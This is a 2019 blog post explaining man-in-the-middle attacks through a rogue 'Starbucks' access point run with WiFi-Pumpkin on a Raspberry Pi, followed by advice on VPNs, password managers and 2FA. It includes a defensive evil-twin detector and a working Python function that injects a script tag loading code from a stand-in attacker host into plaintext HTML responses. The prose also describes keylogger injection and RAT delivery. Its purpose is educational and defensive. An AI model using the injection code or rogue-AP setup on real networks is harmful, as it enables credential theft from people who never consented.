Intro to CyberSecurity + Pumpkin Pi Rogue AP Attack

I’ve always had a fascination with cybersecurity, an interest that peaked years ago, before I became a software developer through a coding bootcamp.

Tiffany Abraham
The Startup
Dec 12, 2019


All aspects interest me, from cyberactivism (‘hacktivism’) to elaborate state-level cyberattacks such as Stuxnet, which sabotaged uranium enrichment by physically destroying centrifuges. Today I hope to give you an idea of how easy it is to have your identity stolen, along with a few practical first steps to improve your digital security. I’ll go through the basics of a man-in-the-middle attack using a Pumpkin Pi as a rogue access point (AP), to show you just how little knowledge it takes.


Defining Vulnerabilities & Exploits

In cybersecurity, a vulnerability is a weakness in a system (a bug, a misconfiguration, or a design flaw) that a threat actor (attacker) can take advantage of.

An exploit is code, or a technique, that takes advantage of a vulnerability to carry out an attack.

“Owned”: Owned is a slang word that originated among 1990s hackers, where it referred to “rooting”, i.e. gaining root or administrative control over someone else’s computer.

First, of many, Mr.Robot references (sorry not sorry)

On Public WiFi? Use a VPN or else.

VPN stands for Virtual Private Network. A VPN creates an encrypted tunnel from your device to the VPN provider’s server, and your traffic travels the rest of the way to its destination from there. Anyone on the local network (including the operator of a rogue access point) sees only encrypted traffic headed to the VPN server, which is why it matters on public WiFi; the trade-off is that you are now trusting the VPN provider with that same traffic. I’m about to show you how a trip to Starbucks could end in your identity being compromised via a man-in-the-middle attack.

MITM attack VS using a secure VPN (green line)

What’s a Man-in-the-Middle Attack?

A man-in-the-middle (MITM) attack is one where the attacker sits between you and the service you are talking to, relaying the connection while reading, and potentially modifying, the data that passes through it: log-in credentials, banking information, and more. On a rogue access point the attacker is the network, so every packet goes through them. A VPN takes the local network out of the picture by encrypting everything between your device and the VPN server; HTTPS does the same per site, which is why the attacker’s easiest wins are unencrypted HTTP, DNS, and pages you type credentials into yourself.

Choosing a VPN

Link: TechRadar comparison of VPN services(2019)

ExpressVPN: I currently use ExpressVPN, the Android app has a feature where you can choose to connect to a VPN whenever you’re not on a network you trust (NordVPN seems to have possibly dropped this feature). It’s widely considered one of the best VPNs you can get.

“[ExpressVPN is] The best all-round VPN service for speed, privacy and unblocking “ — TechRadar 2019

NordVPN: I also used to recommend NordVPN, although I no longer use their service after a server breach earlier this year; Nord kept the breach secret for months until a security researcher pressured them to disclose it via Twitter. Hacks are to be expected, but it’s the misleading marketing as the ‘most secure VPN’ and the lack of transparency that make ExpressVPN the clear choice.

The ‘Evil Twin’ Starbucks Attack Example

Disclaimer:

Knowing how attacks work is a crucial part of educating people who want to learn about, and potentially work in, cybersecurity. BUT I do NOT encourage, promote or endorse illegal activities IN ANY WAY. If you’re in a public place and want to experiment (especially if you’re naming an open network AP something misleading like ‘Starbucks’), MAKE SURE YOU HAVE LEGAL PERMISSION TO DO SO; otherwise devices whose owners have not consented could connect to it, which is potentially illegal (and not cool). Again, this is for cybersecurity educational purposes only.

Pumpkin Pi

All the attacker needs is a bit of familiarity with the bash command line, a $35 Raspberry Pi with Kali Linux installed, a USB wireless network adapter (roughly $25) whose chipset supports AP mode (the rogue network has to be hosted on a separate interface from the one providing the upstream internet connection), and WiFi-Pumpkin installed.


WiFi-Pumpkin is a framework for creating rogue access points and running MITM attacks against the devices that connect to them.

My Raspberry Pi

Here’s a photo of my Raspberry Pi running Kali Linux; notice it doesn’t have the wireless network adapter. (If you haven’t heard of the Raspberry Pi’s potential, check these project ideas out.)

Rogue AP named ‘Free WiFi’

The attacker configures their rogue access point with the SSID set to “Starbucks” and makes it an open, unencrypted network. Devices remember the networks they have joined and automatically reconnect to any access point advertising the same name and security type, so anyone who has ever used the real open Starbucks WiFi is a candidate to join the rogue one without lifting a finger. Because the rogue AP usually sits closer to the victims than the real one, it tends to win on signal strength too.

Rogue AP diagram (source)

Let’s say you go into Starbucks, sit down after getting your venti Toasted White Chocolate Mocha Frappuccino, and open up your laptop. Your computer automatically connects to the attacker’s rogue “Starbucks”, and as far as you know, you’re connected “privately”. Attackers can easily serve a fake login page as well, one that looks just like the Starbucks captive portal, and collect whatever you type into it. You decide to check your bank account, and everything seems to be normal…but across the room, a nefarious person is listening in. How much they can actually read depends on the traffic: plain HTTP and DNS are fully visible, while a correctly configured HTTPS site such as your bank hides the page contents and resists tampering, which is why the fake portal page is the attacker’s more reliable way to harvest credentials.
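The auto-join behaviour described above leaves a fingerprint that a client can look for before connecting. The following is an added example, not code from the original post or from WiFi-Pumpkin: it parses a scan (constructed sample data in a simple pipe-separated layout, SSID|BSSID|security|signal dBm; adapt `parse_scan()` to whatever your scanner prints) and flags the two classic evil-twin indicators, the same SSID advertised both encrypted and open, and a network you saved as WPA2 showing up open.

```python
"""Evil-twin indicators in a Wi-Fi scan (added example, not from the post)."""
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample scan: the real Starbucks AP is WPA2, the rogue clone is open.
SAMPLE_SCAN = """\
Starbucks|aa:bb:cc:11:22:33|WPA2|-61
Starbucks|de:ad:be:ef:00:01|--|-34
HomeNet|00:11:22:33:44:55|WPA2|-72
Free WiFi|de:ad:be:ef:00:02|--|-35
"""

# Networks this laptop would auto-join, with the security type they were saved as.
SAVED_PROFILES = {"Starbucks": "WPA2", "HomeNet": "WPA2"}

OPEN = "--"  # marker for an open (unencrypted) network in the scan layout


@dataclass(frozen=True)
class BSS:
    ssid: str
    bssid: str
    security: str
    signal: int


def parse_scan(text: str) -> list:
    """Parse the pipe-separated scan layout into BSS records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ssid, bssid, security, signal = line.split("|")
        records.append(BSS(ssid, bssid.lower(), security, int(signal)))
    return records


def find_evil_twins(records: list, saved: dict) -> list:
    """Return findings as {"ssid", "reason", "bssids"} dicts.

    mixed-security: one SSID is advertised both encrypted and open. An attacker
      who does not know the PSK clones the name as an open AP.
    saved-secure-seen-open: a profile saved as WPA2 appears open here, so the
      name is being impersonated (a real network does not silently change type).
    """
    by_ssid = defaultdict(list)
    for r in records:
        by_ssid[r.ssid].append(r)

    findings = []
    for ssid, bsses in by_ssid.items():
        open_bssids = [b.bssid for b in bsses if b.security == OPEN]
        secured = {b.security for b in bsses if b.security != OPEN}
        if open_bssids and secured:
            findings.append({"ssid": ssid, "reason": "mixed-security",
                             "bssids": open_bssids})
        if open_bssids and saved.get(ssid) not in (None, OPEN):
            findings.append({"ssid": ssid, "reason": "saved-secure-seen-open",
                             "bssids": open_bssids})
    return findings


def strongest_is_open(records: list, ssid: str) -> bool:
    """True if the loudest AP for this SSID is open: a rogue AP in the same
    room usually out-shouts the real one mounted on the ceiling."""
    same = [r for r in records if r.ssid == ssid]
    return bool(same) and max(same, key=lambda r: r.signal).security == OPEN


if __name__ == "__main__":
    scan = parse_scan(SAMPLE_SCAN)
    for f in find_evil_twins(scan, SAVED_PROFILES):
        print(f"{f['ssid']}: {f['reason']} via {', '.join(f['bssids'])}")
```

Run against the sample, only “Starbucks” is flagged, on both counts, and its strongest BSS is the open clone; “Free WiFi” is open but has no encrypted sibling and no saved profile, so it is merely untrusted, not an impersonation.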

The attacker could just as easily enable pumpkin-proxy plugins like keylogger, which injects JavaScript into the unencrypted web pages relayed through the proxy and reports back every keystroke you type into them; now they’ve got that password you use for way too many websites. Even if your password was amazingly well thought out, they would still have it, because the plugin records the keystrokes themselves rather than guessing or cracking anything.

Another Mr.Robot GIF

You’ve Just Been Owned.

Your identity and data are compromised: your SSN, DOB, credit card numbers, medical records, your most personal data, all up for sale to the highest bidder on the dark web, on some .onion site.

The risk doesn’t stop there: with the same easily configurable pumpkin-proxy plugins the attacker can inject malicious HTML or JavaScript into any unencrypted page on its way to your browser. There are many more intricate attacks that I won’t go into here; these are just to show how easily somebody could execute an attack.
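This is what the keylogger and script-injection plugins above have in common: the proxy rewrites an HTTP response body before forwarding it. The following is an added example written for this post, not pumpkin-proxy’s own code, showing the mechanism on constructed responses (the `PAYLOAD` points at a placeholder attacker host, `http://10.0.0.1/k.js`, that does not exist). It also shows the two things a working injector has to get right, and why HTTPS stops it: only uncompressed `text/html` bodies can carry script, the `Content-Length` header must be rewritten or the browser truncates the page, and a TLS record is opaque bytes the proxy cannot even parse.

```python
"""Script injection into plaintext HTTP responses (added example, not
WiFi-Pumpkin code). PAYLOAD, the responses and the TLS bytes are constructed."""

PAYLOAD = b'<script src="http://10.0.0.1/k.js"></script>'  # hypothetical attacker host


def http_response(content_type: bytes, body: bytes) -> bytes:
    """Build a minimal HTTP/1.1 200 response with a correct Content-Length."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + content_type
            + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\n\r\n" + body)


# Constructed samples: a captive-portal style HTML page, a JSON API reply, and
# the start of a TLS 1.2 application-data record (type 0x17, version 0x0303).
HTML_PAGE = http_response(b"text/html; charset=utf-8",
                          b"<html><body><form><input name=pw></form></body></html>")
JSON_API = http_response(b"application/json", b'{"balance": 1234}')
TLS_RECORD = bytes.fromhex("1703030020") + bytes(range(32))


def parse_response(raw: bytes):
    """Split an HTTP/1.x response into (status line, header dict, body), or
    return None if the bytes are not one (for example a TLS record)."""
    if not raw.startswith(b"HTTP/1."):
        return None
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inject_script(raw: bytes, payload: bytes = PAYLOAD) -> bytes:
    """Return raw with payload inserted before </body> when, and only when, the
    bytes are an uncompressed, non-chunked text/html HTTP response. Anything
    else (JSON, images, TLS records) is passed through unchanged."""
    parsed = parse_response(raw)
    if parsed is None:
        return raw  # opaque: nothing to inject into
    status, headers, body = parsed
    if not headers.get(b"content-type", b"").lower().startswith(b"text/html"):
        return raw  # only HTML documents execute script
    if b"content-encoding" in headers or b"transfer-encoding" in headers:
        return raw  # would need decompressing / de-chunking first; left alone here
    idx = body.lower().rfind(b"</body>")
    new_body = body[:idx] + payload + body[idx:] if idx != -1 else body + payload
    # The length header must match the new body or the browser truncates it.
    headers[b"content-length"] = str(len(new_body)).encode()
    header_block = b"\r\n".join(
        [status] + [name.title() + b": " + value for name, value in headers.items()])
    return header_block + b"\r\n\r\n" + new_body


if __name__ == "__main__":
    print(inject_script(HTML_PAGE).decode())
    print("TLS record unchanged:", inject_script(TLS_RECORD) == TLS_RECORD)
```

The defence is on the server side, not the client: serve every page over HTTPS and send HSTS so the browser never makes the plaintext request the proxy is waiting for.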

Plugins mentioned above (keylogger, script injection, etc)

From there, the attacker can use the injected script as a foothold to push a remote access trojan (RAT) onto your system, whether by tricking you into downloading it or by exploiting a browser weakness. The attacker can then access your system whenever and from wherever they want, often without you noticing. They can access your live webcam, your live screen, your hard-drive contents, your keystrokes, etc.

Even once you’ve disconnected from the attacker’s evil twin network and gone home, you’re still compromised: the RAT is a back door into your system, and it keeps working on any network.

They could take full control of your computer and install ransomware.

WannaCry ransomware screenshot — $300 worth of Bitcoin ransom

What is Ransomware?

Ransomware is a type of malware designed to deny access to a computer system or its data until a ransom is paid, typically by encrypting the files and holding the decryption key. The threat is that the data is never decrypted (meaning you’re never getting it back) or, in more recent variants, that sensitive data copied before encryption is released publicly.

What You Can Do: 2FA, VPNs, and Password Managers

I will not be owned (fan-art) | Can you tell I like this show..?

So now that I’ve got you sufficiently paranoid, I have some good news: there’s something you can do.

As mentioned earlier: use a VPN when on unsecured networks. It creates an encrypted tunnel between your device and the VPN server, so the operator of a rogue access point sees only encrypted traffic going to one endpoint and cannot read it, redirect it, or inject into it. That defeats the proxy plugins described above, though it does nothing against a fake login page you type your credentials into yourself, and it moves your trust to the VPN provider.

LastPass

Password Managers

Are you somebody who reuses passwords on multiple sites? That’s a huge no-no: one leaked database hands the attacker every account that shares the password. Sign up for a password manager (like LastPass); then you need only one long master password (that you can remember) to keep all your other passwords safe. Most password managers include a password generator, so every site can get a unique random password you never have to memorize. A manager also autofills credentials only on the domain they were saved for, so a look-alike login page on a rogue network gets nothing filled in, which is a useful tell. You can (and should) also use two-factor authentication (2FA) to secure the password manager itself.

What is 2FA? Getting Started with Two-Factor Authentication

2FA is a security process in which a user proves their identity with two different kinds of evidence, typically something they know (a password) plus something they have (a phone or a hardware key). SMS 2FA is not recommended because of attacks like SIM swapping, where the attacker takes over your phone number and receives your codes, but it’s still better than nothing. Hardware keys using FIDO U2F are the strongest option, because the key signs a challenge bound to the site’s real origin, so a look-alike login page cannot use it. I personally use a YubiKey FIDO U2F USB micro.

Two-factor requires a potential bad actor to first sign in with my secure password; then they’re prompted to insert and hold their finger on the physical USB authentication key, which only I have. This USB is verified by an encrypted token that can be regenerated and reconfigured via Yubico software. I also have my YubiKey and computer credentials set up to allow PIV (smart card), so I can optionally log in to my 2018 MacBook Pro by inserting the YubiKey and typing a PIN, as an alternative to the biometric sensor.

If you don’t want to spend money on a USB key, use an app like Google Authenticator or Authy. I use a 2FA app as a backup for some of my accounts; these work similarly to the USB key: after entering the initial password, you’re instead prompted to enter the time-sensitive 6-digit code from your authentication app of choice. Most 2FA apps use the Time-based One-time Password algorithm (TOTP), which derives a fresh code from a shared secret and the current time, typically every 30 seconds. I prefer LastPass Authenticator as it solves the very real issue of what happens if you lose your phone with all your 2FA codes on it, which is a miserable experience that I have dealt with before. LastPass Authenticator backs up your 2FA configuration securely and, as a bonus, the LastPass password manager integrates smoothly with it.

I hope this blog post was both fascinating and educational, and I’ve included some great resources below for further reference.

Fantastic resources for further research:

Best Method for Creating a Strong Password by AVG

MITM Information by GlobalSign

Info on Remote Access Trojans by Malwarebytes

Raspberry Pi 101+ Projects by PiMyLifeUp

Huge shout-out to Null-Byte for the Pumpkin Pi Tutorial (Null-Byte full tutorial)

More Awesome Raspberry Pi Projects by UbuntuPit

The Motherboard Guide to Not Getting Hacked (Motherboard by Vice’s comprehensive guide, great read)


Full-stack developer. Alumna of Flatiron School's Software Engineering Immersive bootcamp. Trans rights are human rights. Portfolio: https://tiffcyber.